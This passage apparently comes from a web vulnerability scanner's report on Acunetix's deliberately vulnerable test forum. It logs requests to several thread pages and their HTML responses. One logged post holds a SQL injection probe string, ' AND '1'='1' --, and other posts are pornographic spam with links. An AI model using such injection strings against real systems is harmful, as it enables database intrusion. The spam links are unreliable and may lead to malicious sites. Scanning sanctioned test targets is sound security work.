<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
